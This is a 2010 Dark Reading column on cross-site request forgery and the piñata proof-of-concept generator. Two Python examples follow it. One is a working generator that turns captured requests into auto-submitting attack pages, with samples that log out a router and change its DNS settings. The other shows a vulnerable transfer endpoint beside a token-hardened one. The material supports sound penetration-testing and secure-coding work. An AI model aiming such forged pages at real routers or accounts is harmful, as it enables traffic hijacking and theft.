Cross site request forgery (CSRF) is a powerful attack that can have devastating consequences. It's not a new attack, but new tools are released every year because Web developers don't always write secure code that can prevent these attacks. Often, CSRF vulnerabilities go undetected because automated scanners have difficulty detecting them.

John H. Sawyer, Contributing Writer, Dark Reading

April 21, 2010

3 Min Read

OWASP states that the vulnerability is widespread and can affect any Web application that does not check authorization on vulnerable actions, that will process an action if a default login can be passed in the Web request, or that authorizes requests based only on credentials the browser submits automatically, such as a session cookie or the token in a single sign-on environment.

Sounds interesting, right? So what can you do with CSRF? There are a slew of different options, and it depends on the vulnerable Web application. For example, I grabbed two wireless routers I had sitting in my office. One was from Netgear and the other from Linksys. A quick test showed both were vulnerable to CSRF, and I could create a Web page that would log me out of both just by opening the page in my browser while logged in. Not particularly exciting, but it gets worse.

In the SANS SEC 560 course, there is an exercise in which students demonstrate CSRF attacks against a fictitious banking site; the attack lets them transfer money from victims' accounts into their own. Closer to the router CSRF I mentioned above, researchers have published several proofs-of-concept showing how a consumer router's settings could be changed through CSRF to point at malicious DNS servers, redirecting the victim's legitimate traffic to the attacker's servers.

A new tool for creating proof-of-concept CSRF attacks, piñata, was released recently. It is written in Python and designed to take an HTTP request for the vulnerable Web page and turn it into an HTML file containing the CSRF attack. It works for both GET and POST requests. I tested the tool with several requests against my vulnerable wireless routers, first grabbing the HTTP requests via Paros proxy.

The first several test runs threw errors that required me to clean up the requests. It seems piñata was having trouble parsing the User-Agent string in my requests. Once I trimmed it to one value, piñata created the appropriate CSRF attack file. I had similar problems with both GETs and POSTs, but was able to get them to work eventually.

The feature I particularly like is the ability to create CSRF attacks against forms that use the POST method. Piñata creates an attack file with JavaScript that automatically submits the form with the appropriate form values, which is a big time-saver.
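To show what such a generator has to do, here is an added example (my own code, not piñata's) that turns a captured HTTP request into a self-submitting HTML page. The two requests it is fed are constructed for illustration against a hypothetical router at 192.168.1.1; the paths, parameters and session cookie are assumptions, not captures from any real device. The GET case becomes a form whose query parameters are hidden inputs; the POST case reproduces a urlencoded body the same way.

```python
"""Turn a captured HTTP request into a self-submitting CSRF proof-of-concept page.

Added example, not piñata's code. The two sample requests below are constructed
for illustration against a hypothetical router at 192.168.1.1.
"""
from html import escape
from urllib.parse import parse_qsl, urlsplit

# Constructed sample: a GET that logs the admin out of the router.
SAMPLE_GET = (
    "GET /cgi-bin/logout.cgi?action=logout HTTP/1.1\r\n"
    "Host: 192.168.1.1\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/3.6\r\n"
    "Cookie: session=abc123\r\n"
    "\r\n"
)

# Constructed sample: a POST that rewrites the router's DNS servers.
SAMPLE_POST = (
    "POST /apply.cgi HTTP/1.1\r\n"
    "Host: 192.168.1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 48\r\n"
    "Cookie: session=abc123\r\n"
    "\r\n"
    "action=Apply&dns1=203.0.113.53&dns2=203.0.113.54"
)

PAGE = """<html>
<body onload="document.forms[0].submit()">
  <form method="%(method)s" action="%(url)s">
%(inputs)s
  </form>
</body>
</html>
"""


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, target, headers, body).

    Header values are split on the first colon only, so a User-Agent such as
    'Mozilla/5.0 (X11; Linux x86_64)' survives intact.
    """
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method.upper(), target, headers, body


def form_fields(method, target, headers, body):
    """Return (form action path, [(name, value), ...]) for the request."""
    parts = urlsplit(target)
    if method == "GET":
        # Query parameters become hidden inputs; the browser re-attaches them.
        return parts.path, parse_qsl(parts.query, keep_blank_values=True)
    if method == "POST":
        ctype = headers.get("content-type", "")
        if not ctype.startswith("application/x-www-form-urlencoded"):
            raise ValueError("cannot forge a %r body with a plain HTML form" % ctype)
        return target, parse_qsl(body, keep_blank_values=True)
    raise ValueError("HTML forms can only submit GET or POST, not %s" % method)


def build_poc(raw, scheme="http"):
    """Build the HTML attack page for one captured request."""
    method, target, headers, body = parse_request(raw)
    host = headers.get("host")
    if not host:
        raise ValueError("request has no Host header; cannot build an absolute action URL")
    action, fields = form_fields(method, target, headers, body)
    inputs = "\n".join(
        '    <input type="hidden" name="%s" value="%s">'
        % (escape(name, quote=True), escape(value, quote=True))
        for name, value in fields
    )
    url = "%s://%s%s" % (scheme, host, action)
    return PAGE % {"method": method, "url": escape(url, quote=True), "inputs": inputs}


if __name__ == "__main__":
    print(build_poc(SAMPLE_GET))
    print(build_poc(SAMPLE_POST))
```

Two details worth noting: the form only works when the target accepts a urlencoded body (a JSON or multipart endpoint cannot be forged with a bare HTML form, so the generator refuses rather than emitting something that looks right but fails), and the victim's session cookie never appears in the page at all, because the browser attaches it on its own when the form submits, which is the whole point of the attack.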

If you spend any time penetration testing Web applications or work with your Web developers to ensure their code is secure, then make sure you're testing for CSRF vulnerabilities. Maybe by then some of the bugs in piñata will have been worked out. It's definitely a good start for those not familiar with what it takes to craft a CSRF attack using POSTs and JavaScript.
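For the developers on the other side of that test, here is an added example (mine, not from the article or any real banking application) of the same money-transfer endpoint handled two ways: trusting the session cookie alone, which is exactly the OWASP condition above, and requiring a per-session token plus an Origin check. The bank, the accounts, the session id and the attacker's site are constructed for illustration.

```python
"""A state-changing endpoint handled two ways: trusting the session cookie
alone (CSRF-vulnerable) and requiring a synchronizer token plus an Origin
check (hardened). Added example; the bank, accounts and requests are
constructed for illustration.
"""
import hmac
import secrets
from urllib.parse import urlsplit


def make_state():
    """Fresh server-side state: one logged-in session and two accounts."""
    return {
        "sessions": {"abc123": {"user": "alice", "csrf_token": secrets.token_hex(16)}},
        "balances": {"alice": 1000, "mallory": 0},
    }


def do_transfer(state, sender, recipient, amount):
    """The business logic both handlers share."""
    balances = state["balances"]
    if recipient not in balances or amount <= 0 or balances[sender] < amount:
        return 400, "bad transfer"
    balances[sender] -= amount
    balances[recipient] += amount
    return 200, "moved %d from %s to %s" % (amount, sender, recipient)


def transfer_vulnerable(state, req):
    """Authorizes on the session cookie only. The browser attaches that cookie
    to a request the attacker's page submits, so the forged request succeeds."""
    session = state["sessions"].get(req["cookies"].get("session"))
    if session is None:
        return 401, "login required"
    return do_transfer(state, session["user"], req["form"]["to"], int(req["form"]["amount"]))


def transfer_hardened(state, req, site_origin="https://bank.example"):
    """Same endpoint with two CSRF defenses:
    1. the Origin (or Referer) header must name our own site, compared as a
       full scheme+host so 'bank.example.attacker.net' does not pass;
    2. the form must carry the per-session token, which a cross-site page
       cannot read and the browser never sends on its own."""
    session = state["sessions"].get(req["cookies"].get("session"))
    if session is None:
        return 401, "login required"
    headers = req.get("headers", {})
    parts = urlsplit(headers.get("origin") or headers.get("referer") or "")
    if "%s://%s" % (parts.scheme, parts.netloc) != site_origin:
        return 403, "cross-site request rejected"
    if not hmac.compare_digest(req["form"].get("csrf_token", ""), session["csrf_token"]):
        return 403, "missing or invalid CSRF token"
    return do_transfer(state, session["user"], req["form"]["to"], int(req["form"]["amount"]))


# Constructed request as the victim's browser would send it after loading an
# attacker's auto-submitting form: the session cookie is attached automatically,
# the Origin is the attacker's site, and there is no token in the form.
FORGED = {
    "headers": {"origin": "https://attacker.example"},
    "cookies": {"session": "abc123"},
    "form": {"to": "mallory", "amount": "500"},
}


def legitimate_request(state):
    """The same transfer submitted from the bank's own page, token included."""
    return {
        "headers": {"origin": "https://bank.example"},
        "cookies": {"session": "abc123"},
        "form": {"to": "mallory", "amount": "500",
                 "csrf_token": state["sessions"]["abc123"]["csrf_token"]},
    }


if __name__ == "__main__":
    state = make_state()
    print("vulnerable:", transfer_vulnerable(state, FORGED), state["balances"])
    state = make_state()
    print("hardened, forged:", transfer_hardened(state, FORGED), state["balances"])
    print("hardened, legit:", transfer_hardened(state, legitimate_request(state)), state["balances"])
```

The token is the primary control; the Origin/Referer check is a cheap second layer, and this version fails closed when both headers are absent, which some legitimate clients and privacy proxies will trip over, so decide deliberately whether a missing header is a reject or a fall-through to the token check. Note also that the token is compared with `hmac.compare_digest` rather than `==`, so the comparison does not leak timing information.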

John H. Sawyer is a senior security engineer on the IT Security Team at the University of Florida. The views and opinions expressed in this blog are his own and do not represent the views and opinions of the UF IT Security Team or the University of Florida. When John's not fighting flaming, malware-infested machines or performing autopsies on blitzed boxes, he can usually be found hanging with his family, bouncing a baby on one knee and balancing a laptop on the other. Special to Dark Reading.
